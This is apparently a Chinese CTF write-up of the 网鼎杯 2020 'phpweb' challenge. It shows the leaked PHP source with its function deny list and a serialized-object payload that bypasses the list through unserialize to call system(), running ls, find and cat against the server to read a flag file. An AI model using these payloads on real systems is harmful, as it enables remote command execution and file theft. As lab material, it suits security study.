[网鼎杯 2020 朱雀组]phpweb 1
打开实例,发现是个php页面,过了一会页面报错,发现参数func=date&p=Y-m-d h:i:s a
看着像php传递函数执行的请求,尝试修改func为phpinfo
func=phpinfo&p=Y-m-d h:i:s a
可以看到参数被过滤了
采用highlight_file显示当前页面源代码,由于这个页面几秒就刷新一次,所以采用bp抓包
func=highlight_file&p=index.php
可以看到页面源码成功显示,发现php代码
复制响应体,新建html文件粘贴(这边如果在响应体里面复制,会复制到一堆的标签)
屏蔽定时器
打开html,复制php代码
<?php
$disable_fun = array("exec", "shell_exec", "system", "passthru", "proc_open", "show_source", "phpinfo", "popen", "dl", "eval", "proc_terminate", "touch", "escapeshellcmd", "escapeshellarg", "assert", "substr_replace", "call_user_func_array", "call_user_func", "array_filter", "array_walk", "array_map", "registregister_shutdown_function", "register_tick_function", "filter_var", "filter_var_array", "uasort", "uksort", "array_reduce", "array_walk", "array_walk_recursive", "pcntl_exec", "fopen", "fwrite", "file_put_contents");
function gettime($func, $p)
{
$result = call_user_func($func, $p);
$a = gettype($result);
if ($a == "string") {
return $result;
} else {
return "";
}
}
class Test
{
var $p = "Y-m-d h:i:s a";
var $func = "date";
function __destruct()
{
if ($this->func != "") {
echo gettime($this->func, $this->p);
}
}
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
if ($func != null) {
$func = strtolower($func);
if (!in_array($func, $disable_fun)) {
echo gettime($func, $p);
} else {
die("Hacker...");
}
}
开始代码审计
可以在disable_fun数组里面,发现大量php函数被禁用
复制代码到vscode,CTRL+F搜索serialize,未发现反/序列化函数被禁用,采用反序列化执行任意代码
构造payload代码,采用system执行命令
<?php
class test
{
var $p = "ls";
var $func = "system";
}
$func = new test();
$res = serialize($func);
echo $res;
获得反序列化字符串
O:4:"test":2:{s:1:"p";s:2:"ls";s:4:"func";s:6:"system";}
传入func和p参数,成功遍历当前目录
func=unserialize&p=O:4:"test":2:{s:1:"p";s:2:"ls";s:4:"func";s:6:"system";}
没有发现flag,查看根目录
一样没有发现flag,选择用find搜索
func=unserialize&p=O:4:"test":2:{s:1:"p";s:18:"find / -name flag*";s:4:"func";s:6:"system";}
发现与之不同的temp
cat查看
func=unserialize&p=O:4:"test":2:{s:1:"p";s:22:"cat /tmp/flagoefiu4r93";s:4:"func";s:6:"system";}
成功拿到flag
flag{f3b1f195-50f0-4d5b-8ce3-0d44d2ede1e2}